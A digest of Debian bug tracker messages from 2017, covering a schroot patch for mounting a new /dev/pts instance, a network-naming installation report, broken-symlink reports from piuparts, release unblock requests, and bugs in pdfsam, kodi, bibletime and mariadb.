+mounted_ptmx=no
+
+if [ -e "$BUILDPLACE/dev/pts/ptmx" ] && \
+[ -e "$BUILDPLACE/dev/ptmx" ] && \
+! [ "$BUILDPLACE/dev/pts/ptmx" -ef "$BUILDPLACE/dev/ptmx" ]; then
+mounted_ptmx=yes
+chmod 666 "$BUILDPLACE/dev/pts/ptmx"
+mount --bind "$BUILDPLACE/dev/pts/ptmx" "$BUILDPLACE/dev/ptmx"
+fi
+
+ls -l "$BUILDPLACE/dev/ptmx" | sed -e 's/^/# fake-pbuilder: /' >&2
+ls -l "$BUILDPLACE/dev/pts/ptmx" | sed -e 's/^/# fake-pbuilder: /' >&2
+
+e=0
+chroot "$BUILDPLACE" "$@" || e=$?
+
+[ "$mounted_ptmx" = no ] || umount "$BUILDPLACE/dev/ptmx"
+umount "$BUILDPLACE/dev/pts"
+exit "$e"
-- 
2.11.0

>From 322e9ee8c4d7e713df83257913ee6c6ba4a9daea 

Bug#855324: pdfsam fails to start

[Markus Koschany]

Control: tags -1 pending

On Sun, 5 Mar 2017 19:32:38 +0100 Philip Rinn 
[...]
> Great, so changing the value in the  element ~/.pdfsam/config.xml to '0':
> 
> ...
>   
> 
>   0
>^
>|
> ...
> 
> fixes the crash.
> With this fix I'd keep pdfsam in stable, although it's outdated.

I think this is a suitable workaround. I am going to upload a new
revision that sets LAF to 0 by default. Thanks everyone for contributing
to this solution.

Regards,

Markus






signature.asc
Description: OpenPGP digital signature

Bug#696755: installation-reports: confirmation of this bug in testing

[Dennis Crunkilton]

Package: installation-reports
Followup-For: Bug #696755

Dear Maintainer,

*** Reporter, please consider answering these questions, where appropriate ***

   * What led up to the situation?
   * What exactly did you do (or not do) that was effective (or
 ineffective)?
   * What was the outcome of this action?
   * What outcome did you expect instead?

*** End of the template - remove these template lines ***


-- Package-specific info:

Boot method: network install
Image version: 
http://ftp.nl.debian.org/debian/dists/testing/main/installer-i386/current/images/netboot/debian-installer/i386/linux
 
http://ftp.nl.debian.org/debian/dists/testing/main/installer-i386/current/images/netboot/debian-installer/i386/initrd.gz
 
http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/testing/current/firmware.tar.gz
 09:57 30-01-17  
Date: 

Machine: headless, old not normally used fanless VIA Nehemiah, small ram, CF 
card for HD
Partitions: 


Base System Installation Checklist:
[O] = OK, [E] = Error (please elaborate below), [ ] = didn't try it

Initial boot:   [O]
Detect network card:[O]
Configure network:  [O]
Detect CD:  [ ]
Load installer modules: [O]
Clock/timezone setup:   [O]
User/password setup:[O]
Detect hard drives: [O]
Partition hard drives:  [O]
Install base system:[O]
Install tasks:  [O]
Install boot loader:[O]
Overall install:[O]

Comments/Problems:


I performed 3-installations because of the symptoms. First install
 was edit /etc/.apt/sources.lst to testing or maybe strech; apt-get
 update; apt-get dist-upgrade. Symptoms: lost network on re-boot.  
 Connected monitor and keyborad. /sbin/ifconfig showed no wlan0 .
 ip a showed a long string wlx000272ac8d9b instead of wlan0. 
-ip link set wlx000272ac8d9b up; 
 iwconfig wlx000272ac8d9b mode managed essid beegeet key 1234567890;
 ifconfig wlx000272ac8d9b 192.168.1.109-
 route add defalut gw 192.168.1.1;
 brought up the network, which was then reachable  via ssh from
 a work station. This was left running for about a week. Since this
 proceedure seemed tedious to bring up the network, I proceeded to
 do a new from scratch network install.

 The 2nd install, a network install,  produced a seemingly un-useable 
 installation due to lack of network after reboot. This time no 
 /sbin/ifconfig; no /sbin/route. It looked to me like I had a badly
 broken installation without the utilities to bring up the network.

Suspecting a bad CF disk, I started a 3rd install, network install, 
with another CF card. Installed grub to CF card. Downloaded net boot
imaged files to CF card. Edited grub to boot images. Inserted into 
target machine. Proceeded with a mostly normal installation. However,
the detected network eth and wlan devices were listed as long strings,
e.g. wlx000272ac8d9b. (maybe this is normal?)Proceeded with nework 
install via the wireless usb device. Installed only ssh server and unilities. 

No network on reboot. No /sbin/ifconfig. No /sbin/route. After
consulting references on use of /sbin/ip, brought up network:
ip a # observer device name long string
ip link set wlx000272ac8d9b up
iwconfig wlx000292ac8d9b mode managed essid beegeet2 key 1234567890
ip a add 192.168.1.108/24 dev wlx000272ac8d9b
ip route add default via 192.168.1.1

Installation was now reachable from a workstation via ssh.

Further investigation revealed:

no /etc/udev/rules.d/70-persistent-net.rules; no such file

After apt-get install net-tools , I was able to get the network 
to come up automatical with the following section in
/etc/network/interfaces:

auto wlx000272ac8d9b
allow-hotplug wlx000272ac8d9b
iface wlx000272ac8d9b inet static 
address 192.168.1.108
broadcast 192.168.1.255
netmask 255.255.255.0
gateway 192.168.1.1
wireless-mode managed
wireless-key 1234567890
wireless-essid beegeet2
wireless-channel 11

At this point I had a network after reboot. However, this not what I
would want on production system. Too much typing of long net device
name. I expect network device names like eth0 , wlan0 , etc.

The one pleasant surprise is that I did not have to apt-get install
any firmware for wireless devices after first boot.

Please make sure that the hardware-summary log file, and any other
installation logs that you think would be useful are attached to this
report. Please compress large files using gzip.

Once you have filled out this report, mail it to sub...@bugs.debian.org.

==
Installer lsb-release:
==
DISTRIB_ID=Debian
DISTRIB_DESCRIPTION="Debian GNU/Linux installer"
DISTRIB_RELEASE="9 (stretch) - installer build 20170127"
X_INSTALLATION_MEDIUM=netboot

==
Installer hardware-summary:
==
uname -a: Linux debian 4.9.0-1-686 #1 SMP Debian 4.9.2-2 (2017-01-12) i686 

Bug#856871: singular-doc: broken symlink: /usr/share/info/singular.info.gz -> singular.hlp.gz

[Jerome BENOIT]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Hello Andreas, thanks for your  report.

On Sun, 05 Mar 2017 18:56:00 +0100 Andreas Beckmann  wrote:
> Package: singular-doc
> Version: 1:4.0.3-p3+ds-5
> Severity: normal
> User: debian...@lists.debian.org
> Usertags: piuparts
> 
> Hi,
> 
> during a test with piuparts I noticed your package ships (or creates)
> a broken symlink.
> 
> >From the attached log (scroll to the bottom...):
> 
> 0m24.6s ERROR: FAIL: Broken symlinks:
>   /usr/share/info/singular.info.gz -> singular.hlp.gz
> 
> 
> A file called singular.hlp.gz does not seem to exist in any
> package in the Debian archive.

singular.info was distributed as compressed before the venue of Singular:
I forget this link story. I will fix it in my next packaging.

Thanks,
Jerome

> 
> 
> cheers,
> 
> Andreas

- -- 
Jerome BENOIT | calculus+at-rezozer^dot*net
https://qa.debian.org/developer.php?login=calcu...@rezozer.net
AE28 AE15 710D FF1D 87E5  A762 3F92 19A6 7F36 C68B
-BEGIN PGP SIGNATURE-

iQQcBAEBCgAGBQJYvGZsAAoJED+SGaZ/NsaLNVMf/3tWQdyVdnBFqepBtxDfmMYh
Pk/Pn/01MLk9qPATZwHSn5ypQ0S8/RqIsnBNqFCp5cYcrqnvfmY+aBeI+B7xADaH
+tit1t1h7654+ka7aA49y6KZQJWk/Skbr5HU3TjVHvPTdDO+l2CUmmUrdGCpuTX8
Z4vX37yR3VVRr6fnA1zZ8EvbKzI5hJNYlygXWqC1/HAEcmZ1HvuUfqZ3gfi8R0SN
FNA4F3R+gPM4j6MTTQIm9hpa5CHLcmz9wei7KZvgkiA7IvuSpOiQc7eQHnOjaenZ
qVwYNPlXQ9K9bwE0maQ5UvR5Eve/a1tZbc+5UPLEIaZ2VyAJZVwMq/2Jhyd7eYbj
rzXLo8UEAveHv61PiXTfYhrqOsuP2jaEvnymR6BDQ3DcE0/IuVhpHxtwaRnLk4FN
/yxWIUxGF24JzCe1QFdOdwlPUpWIgp0M1MtSIFFUtg06+1/2nTQbytAOtO3TFSUF
FBXL8ypw1yvLcjJui8eA7Yp5JkRD6OLMZxrKBtTgZWtlPa5Z0BuCBiTHgu7Nf1BA
PjP+SxMuRPVY9lLwklNWCahMjlnOfbh3DLaw0qN+8VDcVpNnrv1vgfv5SM74qkjs
GO0bG5krg3WevBpjFBQEQxG8/VjrdtTBYrnqBVbomAJUEHmmU/CDHMBO/PxPK2N1
jCeSwlVT0dJ0m4lgVh7SP1eLVeT4Xbo/aXSoaUyXDd8XbBGdehrVh/P3XV91jAgC
zPdsqY4S0+P1OE/tRx3penKGVilNFUn5djTnwPDXhFDPMUqrblZYKBhPwUjB/gT6
4dOPyYdeTazeheek9sCXnNrZIWFMZX6KAZOKjao7o/79BrfCdPeaYp/rpWdKcwj6
zXgrC1uwqcNllC4XjohxFlPphwsOUFBJtr90uY9xnB6UQHgLATM84r0s3nTbJjvN
9DmJZAEpLZu5H96/RztP05AaeJekEH5xpHMCJ0u20KVRofZ9aHSR5rtqZTc1BBiU
Wf5z3yWyWr2pftfqnmFoeq7jkg5JmXdfUmJW78BX1rAWU6X3+jj+mLHk2YIga0ZK
HXlGG20eQaZVeoX0V+F3rUilzl1VVVSer3uHZnreOsXbUm9ZO0i7P/Jj5DUJFoLd
WgN+jyqVDyNHDViWo8vOOE/zKk0gcIVZDjbQk4liqM3lMpXJ0ALuDRFZCZbG2uPv
1PKVpdHP7GdA519hH5ivcpUEnsXetFtE5f8tbG2uia94EVYX46+dOfpBCYzL5I/H
qw5MT9l2Vj4SaOp6NYOw8ILGhte6kttnmvYIEOlLbONf8joF4lHxOD4C4p6AAUSz
XFly2l3WhYGm1DZOGXhqefx1OYgheHTgZ9G2P00wl9b6quySKwgmrlANvQ2Yj30=
=Uioi
-END PGP SIGNATURE-

Bug#856877: schroot: Please consider mounting a new instance of /dev/pts

[Simon McVittie]

Package: schroot
Version: 1.6.10-3
Severity: normal
Tags: upstream

As documented in

and in 
(for historical context you might want to read the v3.16 version, chosen to
represent Debian jessie, before the latest version), the preferred way to
set up /dev/pts inside containers in recent kernels is to mount a new
instance of the devpts filesystem on /dev/pts, either use ptmxmode=666 or
chmod /dev/pts/ptmx to 0666 afterwards, and arrange for /dev/ptmx to be
equivalent to /dev/pts/ptmx via a symbolic link or bind-mount.

In particular, this would make the chroots created by debootstrap
versions 1.0.76 to 1.0.88 (inclusive) work as expected. In those chroots,
/dev/ptmx is a symbolic link to pts/ptmx. That is considered to be a RC
bug in debootstrap (#817236, RC because it broke existing functionality),
and I have proposed a patch; but with my proposed patch, debootstrap
will still create chroots with /dev/ptmx -> pts/ptmx if it is run
in a container manager that restricts device node creation, such as
systemd-nspawn, because that seemed better than failing outright.

Invoking script(1) is a common way to test this.

A nice side-effect of this change, which I discovered while testing a
cut-down version of the same code in a new debootstrap autopkgtest, is
that it makes script(1) work inside "schroot --sbuild" inside a LXC
container on a Debian jessie kernel. Previously, that would have failed.

I'm filing this as a new bug rather than detaching one of the merged bugs
from #817236 because the only one that originally concerned schroot
was #817236 itself, and it would seem needlessly confusing to repurpose
that bug number.

I attach a schroot patch that does as I request. I'm also going to attach
a patch to #817236 that will extend debootstrap's autopkgtest to run a
heavily cut-down version of the same logic, to confirm that it does in
fact work.

Unfortunately, this does cause a regression for interactive use:
processes inside an interactive schroot cannot tell that their
stdin/stdout/stderr is in fact connected to a terminal, because that
terminal is not visible to them. As a result, programs like sudo and
screen will refuse to run, unless wrapped in something like
"script /dev/null". So it might be necessary for schroot to provide
its own pty (one that *is* valid inside the chroot) and forward
input/output to/from the terminal outside the chroot, or something?
(I think that's what container managers like lxc and systemd-nspawn do.)
As a result I'm not tagging this as 'patch'.

Regards,
S
From: Simon McVittie 
Date: Mon, 20 Feb 2017 10:43:24 +
Subject: Mount a new instance of /dev/pts in the chroot

This is considered to be best-practice for container managers in
Linux >= v2.6.29 with CONFIG_DEVPTS_MULTIPLE_INSTANCES=y. That config
option was made unconditional in v4.7.

This has some assumptions, which cannot be avoided if we are going to
mount /dev/pts using schroot's fstab:

* If the kernel is older than v4.7, it is assumed to be v2.6.29 or
  later with CONFIG_DEVPTS_MULTIPLE_INSTANCES=y. Users of older kernels,
  or intermediate versions with CONFIG_DEVPTS_MULTIPLE_INSTANCES=n,
  can revert this change via /etc.

* gid 5 must be the right owner for ptys. This is correct for Debian
  (it's the hard-coded tty group specified in base-passwd) and probably
  many other distributions (it's systemd's configure-time default) but
  not necessarily correct everywhere. However, if the host system and the
  chroot disagree on the right gid, schroot's previous behaviour would
  have been wrong anyway, because it bind-mounted the host's /dev/pts.

* /dev/ptmx inside the chroot must be either a real device node (as
  created by debootstrap < 1.0.76) or a symlink to pts/ptmx
  (as created by debootstrap >= 1.0.76).

I have proposed a debootstrap patch to make it create the real device
node again if possible. However, there is a desire for debootstrap
to be runnable under container managers that restrict creation of
device nodes, such as systemd-nspawn; under these container managers,
creating /dev/ptmx as a symlink to pts/ptmx is the best that can be
done.

Bind-mounting /dev/pts/ptmx over /dev/ptmx, so that we get the
new instance's /dev/ptmx equivalent instead of the host's, can only
be done from code, so I have done it in the 10mount hook instead of
in the fstab.
---
 etc/profile-templates/buildd/linux/fstab  |  2 +-
 etc/profile-templates/default/linux/fstab |  2 +-
 etc/profile-templates/desktop/linux/fstab |  2 +-
 etc/profile-templates/sbuild/linux/fstab  |  2 +-
 etc/setup.d/10mount   | 12 
 5 files changed, 16 insertions(+), 4 deletions(-)

diff --git a/etc/profile-templates/buildd/linux/fstab b/etc/profile-templates/buildd/linux/fstab
index 26efe88..f2f6136 100644
--- a/etc/profile-templates/buildd/linux/fstab

Bug#848198:

[Anthony Wong]

Hi,

I wonder if we can skip building it from source and just package the
pre-built font file provided by Google? Like what we are doing with Noto
CJK font.
The license of the font file is SIL Open Font License Version 1.1, as far
as I check.

Thanks,
Anthony Wong

Bug#852395: unblock: gssproxy/0.5.1-2

[Daniel Pocock]

On 05/03/17 19:42, Niels Thykier wrote:
> On Sat, 04 Feb 2017 09:58:00 + Niels Thykier  wrote:
>> Daniel Pocock:
>>> [...]
>>>
>>> Upstream is not really supporting rpc.svcgssd any more, they actually
>>> disabled it in the build so people can still have it as a transitional
>>> measure in stretch.
>>>
>>> People shouldn't be using it in any new installations.  Offering them
>>> gssproxy is a very sensible thing to do.
>>>
>>> Regards,
>>>
>>> Daniel
>>>
>> Debian kernel team 
>> Ok, follow up questions:
>>
>>  * Do you have an upstream reference to the state of rpc.svcgssd?


http://git.linux-nfs.org/?p=steved/nfs-utils.git;a=commit;h=24b5d60d7f0a514310df810e3eb27b72f665febf

"svcgssd: Disable support for the rpcsec_gss server by default

At this point the gssproxy is better option than the
svcgssd so the support is off by default.

Use --enable-svcgss to re-enable the support"

but it looks like it may not be completely abandoned, there have been
other commits that mention gssd recently.


>>
>>  * Can we provide both rpc.svcgssd and gssproxy in Debian (with the
>>admin choosing) or is it an "xor"?
>>

I think there are two questions:

a) can they both exist in different packages that conflict with each
other?  I'm guessing that will probably be yes.

b) can they both be installed simultaneously?  Possibly not (can anybody
on the linux-nfs list answer?)


>>  * If this package is unblocked, are there any changes needed in
>>nfs-common needed to support gssproxy?  (source upload, binNMU or
>>"just works with no further changes")
>>

I don't have time to investigate that right now, if anybody else has
time to look more closely that would be great.

Regards,

Daniel

Bug#847462: the problem is with CUPS

[Francesco Potortì]

>> If you want to tell me that che cups-pdf driver is useless because it's
>> possible to print to file from the print interface, okay, I'll buy it.
>
>I never said cups-pdf was useless. I would say its use is inappropriate
>in some situations. Converting an existing PDF to a PDF is one of them.

Speaking from a user's point of view, when I print from Firefox, I am
not converting anything.  I view a web page and I want to have it in
PDF.  So I cannot tell whether it is appropriate using cups-pdf.  This
is the normal use case.

>From a system programmer's point of view, if I try to debug the problem,
I can discover that Firofox does internally create a PDF file and I will
have a clue as to how to diagnose what's happening.  This has nothing to
do with the use case or the user's point of view.

>As for buying it, you and the upstrem author agree:
>
>  > I remain with my view that if your application already
>  > supports PDF output - why not simply print to a file.
>That's from #658004.

Firefox does not support PDF printing, without add-ons at least, so this
case is not relevant.

However, the system's graphical printing interface does support
generating a PDF.  This in fact makes cups-pdf suboptimal or simply
useless for locally generating PDF files, at least when a GUI is
available, unless I am missing anything.

>A wishlist bug against cups-pdf would be the way to go.

I'll follow your advice and file a wishlist report.

>> No, I do just want to have a PDF file produced in my ~/PDF directory.
>> The above steps are meant to help debugging the problem.
>
>No? But that is what you are doing. A Firefox produced PDF can go in
>~/PDF.

You are not following what I write.

>> In contrast, as far as I can see, cups-pdf is intended to be generic,
>> rather than specific for PS files.  This is what I read on the Debian
>> package description as well as on .
>
>The package description doesn't mention "generic". Neither can I see the
>word at upstream's home page,

You sidestep the issue and try to nit-pick.  I'll stop here.

-- 
Francesco Potortì (ricercatore)Voice:  +39.050.621.3058
ISTI - Area della ricerca CNR  Mobile: +39.348.8283.107
via G. Moruzzi 1, I-56124 Pisa Skype:  wnlabisti
(entrance 20, 1st floor, room C71) Web:http://fly.isti.cnr.it

Bug#847701: kodi: Movie player unusable with libva error

[Bálint Réczey]

Control: reassign -1 kodi 2:17.0~beta5+dfsg1-4
Control: fixed -1 2:17.1~rc1+dfsg1-1

Hi Leandro,

2017-01-20 16:46 GMT+01:00 Bálint Réczey :
> Hi Leandro,
>
> 2017-01-20 15:12 GMT+01:00 Leandro Noferini :
>> Bálint Réczey  writes:
>>
>>
>> [...]
>>
> It looks like the system is really slow for the video.

 But really it was very good before the upgrade of kodi.
>>>
>>> Do you know which kodi upgrade broke it? Can you revert to a kodi
>>> version which does work?
>>
>> Yes, I know very well which version is broken: version
>> 16.1+dfsg1-2~bpo8+1_amd64 (still) works well but not 17.0~rc2+dfsg1-1
>> (today update).
>
> There is a pretty big difference between those two binary packages.
> 16.1+dfsg1-2~bpo8+1 uses dependencies only from jessie and
> jessie-backports and 17.0~rc2+dfsg1-1 uses dependencies from sid only.
> The issue can be caused either by kodi or any dependency.
> Let me compile 16.1 on sid and test that one.

On my system the latest kodi upload to experimental (2:17.1~rc1+dfsg1-1)
fixed the slow playback issues which are still reproducible with 2:17.0+dfsg1-3
which shows this is a kodi bug.

Does the version in experimental work for you, too?

Cheers,
Balint

PS: Thanks for the private perf data, it points at kodi, too.

Bug#856876: bibletime: save button in personal commentary does not work correctly

[joe belisle]

Package: bibletime
Version: 2.10.1-3
Severity: normal

Dear Maintainer,

*** Reporter, please consider answering these questions, where appropriate ***

   * What led up to the situation?
I tried to save comments in the personal commentary.

   * What exactly did you do (or not do) that was effective (or
 ineffective)?
Every time I press the Save button the Save Text? dialog window will simply
reset itself.  No matter how many times you press the Save button the  dialog
window does not disappear it just keeps on renewing itself.  I would finally
press the No button and the dialog window would go away but the entry in the
commentary would not be saved.  I found that by pressing the Save button and
then pressing the X button on the top right of the Save Text? dialog window it
will save the written comments and then close the dialog window.

   * What outcome did you expect instead?
When pressing the Save button in the Save Text? dialog window that the text
would be saved and then the dialog window would close.




-- System Information:
Debian Release: 9.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages bibletime depends on:
ii  bibletime-data  2.10.1-3
ii  libc6   2.24-9
ii  libclucene-core1v5  2.3.3.4+dfsg-1
ii  libgcc1 1:6.3.0-6
ii  libqt4-dbus 4:4.8.7+dfsg-11
ii  libqt4-svg  4:4.8.7+dfsg-11
ii  libqt4-xml  4:4.8.7+dfsg-11
ii  libqtcore4  4:4.8.7+dfsg-11
ii  libqtgui4   4:4.8.7+dfsg-11
ii  libqtwebkit42.3.4.dfsg-9.1
ii  libstdc++6  6.3.0-6
ii  libsword11v51.7.3+dfsg-9+b2

bibletime recommends no packages.

bibletime suggests no packages.

-- no debconf information

Bug#856875: gcc-6-cross: gcc-6- ship broken symlink: /usr/lib/gcc-cross//6/libcc1.so -> ../../../..//lib/libcc1.so.0

[Andreas Beckmann]

Source: gcc-6-cross
Version: 18
Severity: normal
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed the gcc-6- cross compilers
ship a broken symlink.

>From the attached log (scroll to the bottom...):

0m32.5s ERROR: FAIL: Broken symlinks:
  /usr/lib/gcc-cross/mipsel-linux-gnu/6/libcc1.so -> 
../../../../mipsel-linux-gnu/lib/libcc1.so.0

There seems to be no foreign-arch variant of that library available
- do I have to install some foreign dependencies first?
But even installing libcc1-0:mipsel wouldn't satisfy the target path.

These related files/symlinks are shipped (on amd64):

gcc-6: /usr/lib/gcc/x86_64-linux-gnu/6/libcc1.so
gcc-6-aarch64-linux-gnu: /usr/lib/gcc-cross/aarch64-linux-gnu/6/libcc1.so
gcc-6-alpha-linux-gnu: /usr/lib/gcc-cross/alpha-linux-gnu/6/libcc1.so
gcc-6-arm-linux-gnueabi: /usr/lib/gcc-cross/arm-linux-gnueabi/6/libcc1.so
gcc-6-arm-linux-gnueabihf: /usr/lib/gcc-cross/arm-linux-gnueabihf/6/libcc1.so
gcc-6-hppa-linux-gnu: /usr/lib/gcc-cross/hppa-linux-gnu/6/libcc1.so
gcc-6-m68k-linux-gnu: /usr/lib/gcc-cross/m68k-linux-gnu/6/libcc1.so
gcc-6-mips-linux-gnu: /usr/lib/gcc-cross/mips-linux-gnu/6/libcc1.so
gcc-6-mips64-linux-gnuabi64: 
/usr/lib/gcc-cross/mips64-linux-gnuabi64/6/libcc1.so
gcc-6-mips64el-linux-gnuabi64: 
/usr/lib/gcc-cross/mips64el-linux-gnuabi64/6/libcc1.so
gcc-6-mipsel-linux-gnu: /usr/lib/gcc-cross/mipsel-linux-gnu/6/libcc1.so
gcc-6-powerpc-linux-gnu: /usr/lib/gcc-cross/powerpc-linux-gnu/6/libcc1.so
gcc-6-powerpc-linux-gnuspe: /usr/lib/gcc-cross/powerpc-linux-gnuspe/6/libcc1.so
gcc-6-powerpc64-linux-gnu: /usr/lib/gcc-cross/powerpc64-linux-gnu/6/libcc1.so
gcc-6-powerpc64le-linux-gnu: 
/usr/lib/gcc-cross/powerpc64le-linux-gnu/6/libcc1.so
gcc-6-s390x-linux-gnu: /usr/lib/gcc-cross/s390x-linux-gnu/6/libcc1.so
gcc-6-sh4-linux-gnu: /usr/lib/gcc-cross/sh4-linux-gnu/6/libcc1.so
gcc-6-sparc64-linux-gnu: /usr/lib/gcc-cross/sparc64-linux-gnu/6/libcc1.so
libcc1-0: /usr/lib/x86_64-linux-gnu/libcc1.so.0
libcc1-0: /usr/lib/x86_64-linux-gnu/libcc1.so.0.0.0

gcc-5-cross and gcc-7-cross have similar problems.


cheers,

Andreas


gcc-6-mipsel-linux-gnu_6.3.0-8cross1.log.gz
Description: application/gzip

Bug#856430: unblock android-sdk-meta/25.0.0+3

[Niels Thykier]

Control: tags -1 moreinfo

On Wed, 1 Mar 2017 18:21:56 +0100 Emilio Pozuelo Monfort
 wrote:
> On 01/03/17 00:25, Hans-Christoph Steiner wrote:
> > Package: release.debian.org
> > Severity: normal
> > User: release.debian@packages.debian.org
> > Usertags: unblock
> > 
> > Please unblock package: android-sdk-meta
> > 
> > Support for some common devices was missing  in 25.0.0+1 (#814056).
> > This also fixes another usability bugs with the SDK license handling
> > that was not reported to the bug tracker.
> > 
> > Attached is the source debdiff.
> 
> emilio@tatooine:~$ rmadison android-sdk-meta
> android-sdk-meta | 25.0.0+1  | testing| source
> android-sdk-meta | 25.0.0+2  | unstable   | source
> 
> Where is it?
> 
> Cheers,
> Emilio
> 
> 

Hi Hans,

We are waiting for you on this.

Thanks,
~Niels

Bug#852395: unblock: gssproxy/0.5.1-2

[Niels Thykier]

On Sat, 04 Feb 2017 09:58:00 + Niels Thykier  wrote:
> Daniel Pocock:
> > [...]
> > 
> > Upstream is not really supporting rpc.svcgssd any more, they actually
> > disabled it in the build so people can still have it as a transitional
> > measure in stretch.
> > 
> > People shouldn't be using it in any new installations.  Offering them
> > gssproxy is a very sensible thing to do.
> > 
> > Regards,
> > 
> > Daniel
> > 
> Debian kernel team 
> Ok, follow up questions:
> 
>  * Do you have an upstream reference to the state of rpc.svcgssd?
> 
>  * Can we provide both rpc.svcgssd and gssproxy in Debian (with the
>admin choosing) or is it an "xor"?
> 
>  * If this package is unblocked, are there any changes needed in
>nfs-common needed to support gssproxy?  (source upload, binNMU or
>"just works with no further changes")
> 
> Thanks,
> ~Niels
> 
> 
> 
> 


Hi,

We are waiting for feedback on the above in order to move forward on
this unblock request.

Thanks,
~Niels

Bug#855324: pdfsam fails to start

[Philip Rinn]

On 04.03.2017 at 01:13, gregor herrmann wrote:
> On Mon, 20 Feb 2017 18:31:12 +0100, Philip Rinn wrote:
> 
 If you're willing to try with another window
 manager, that might tell us something.  
>>> Hm, I only have awesome installed
>> Oh, I use Gnome3 - might be the difference?
> 
> Found it: I had _JAVA_AWT_WM_NONREPARENTING=1 set in my ~/.Xsession
> which was at some point needed for running java apps under awesome.
> 
> With _JAVA_AWT_WM_NONREPARENTING=0 pdfsam shows me something useful
> (and also freeplane, where I had the same issue, and raccoon (not in
> Debian), where I also only got an empty window).
> 
> Sorry for the confusion!

Great, so changing the value in the  element ~/.pdfsam/config.xml to '0':

...
  

  0
   ^
   |
...

fixes the crash.
With this fix I'd keep pdfsam in stable, although it's outdated.

Best,
Philip



signature.asc
Description: OpenPGP digital signature

Bug#856874: repro: ships librepro-1.11.so, which should be in libresiprocate-1.11

[Andreas Beckmann]

Package: repro
Version: 1:1.11.0~beta1-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed a broken symlink in
libresiprocate-1.11-dev.

>From the attached log (scroll to the bottom...):

0m27.4s ERROR: FAIL: Broken symlinks:
  /usr/lib/x86_64-linux-gnu/librepro.so -> librepro-1.11.so

Analyzing this I found that librepro-1.11.so is shipped in the
repro package instead of libresiprocate-1.11, which seems wrong
(and breaks anything that Build-Depends: libresiprocate-dev
and links with -lrepro).


cheers,

Andreas


libresiprocate-1.11-dev_1:1.11.0~beta1-1.log.gz
Description: application/gzip

Bug#856873: boot-info-script: new upstream maintainer, new versions exist

[Meik Hellmund]

Package: boot-info-script
Version: 0.61-2
Severity: normal

Dear Maintainer,

boot-info-script version 0.75 can be found at 
https://github.com/arvidjaar/bootinfoscript



-- System Information:
Debian Release: 9.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages boot-info-script depends on:
ii  bsdmainutils  9.0.12
ii  gawk  1:4.1.4+dfsg-1

boot-info-script recommends no packages.

boot-info-script suggests no packages.

-- no debconf information

Bug#855098: mysql_secure_installation

[rugk]

Hi,
actually I also had problems with your decicion not to use 
debian-sys-maint anymore and I would suspect other users, who are used 
to mysql, might have too. Because after a fresh install of 
mariadb-server I did the same steps, which were also recommend for 
mysql: I ran mysql_secure_installation.
This works as expected and the user is assured that the instance is now 
save. However the first thing it does is change the root password, so 
actually this breaks your authentication.


The user knows how he/she did it with mysql, does the same steps with 
mariadb and breaks the whole thing. Usually the user only notices this 
first when trying to stop the mysql service, at which point he/she has 
no clue what is wrong here.
This might affect all users who are security-aware and run 
mysql_secure_installation without knowing the changes done in mariadb.


So please adjust mysql_secure_installation. Maybe remove the password 
change request or make it write the new credentials to 
/etc/mysql/debian.cnf or at least add an explanation there, that 
changing the root password is not recommend and may break everything.


Debian Stretch here.

BTW: The README is really bad to find…

Best regards,
rugk

--
I offer PGP support. To send me a PGP-encrypted mail, please ask for my 
private mail address.

Bug#855098: mysql_secure_installation

[rugk]

Or, add some notes to the wiki page: https://wiki.debian.org/Mariadb

There also nothing about this change is stated…